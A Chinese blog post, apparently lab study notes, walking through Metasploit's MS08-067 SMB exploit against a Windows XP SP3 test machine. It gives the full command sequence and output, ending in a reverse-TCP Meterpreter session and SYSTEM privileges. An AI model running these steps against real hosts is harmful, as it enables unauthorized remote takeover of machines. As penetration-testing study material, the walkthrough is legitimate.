ms08_067漏洞渗透步骤——MSF

最新推荐文章于 2024-03-25 22:33:43 发布

我重来不说话

最新推荐文章于 2024-03-25 22:33:43 发布

阅读量1.2k

点赞数 3

分类专栏：精通Metasploit学习笔记文章标签： metasploit 渗透测试 windows xp kali linux

本文链接：https://blog.csdn.net/qq_19623861/article/details/117061558

版权

精通Metasploit学习笔记专栏收录该内容

41 篇文章 30 订阅

订阅专栏

本文简单介绍了如何使用metasploit针对ms08_067进行渗透测试，仅供学习

测试环境	描述	ip
主机	kali2020	192.168.1.113
目标主机	win xp sp3	192.168.1.108

①启动msf，搜索ms08_067

msf6 > search ms08_067

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi
msf6 >

②使用ms08_067，设置参数，这里的target我设置为34，其他版本的可以使用show targets查看

msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.113    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf6 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.1.108
rhost => 192.168.1.108
msf6 exploit(windows/smb/ms08_067_netapi) > set target 34
target => 34

③进行攻击，获取meterpreter权限并进行提权

msf6 exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 192.168.1.113:4444 
[*] 192.168.1.108:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 192.168.1.108
[*] Meterpreter session 2 opened (192.168.1.113:4444 -> 192.168.1.108:2354) at 2021-05-20 08:55:20 +0800

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >

我重来不说话

关注

3
点赞
踩
2

收藏

觉得还不错? 一键收藏
打赏
0
评论
ms08_067漏洞渗透步骤——MSF

测试环境描述ip主机kali2020192.168.1.113目标主机win xp sp3192.168.1.108①启动msf，搜索ms08_067msf6 > search ms08_067Matching Modules================ # Name Disclosure Date Rank Check Description - ---- ...
复制链接

扫一扫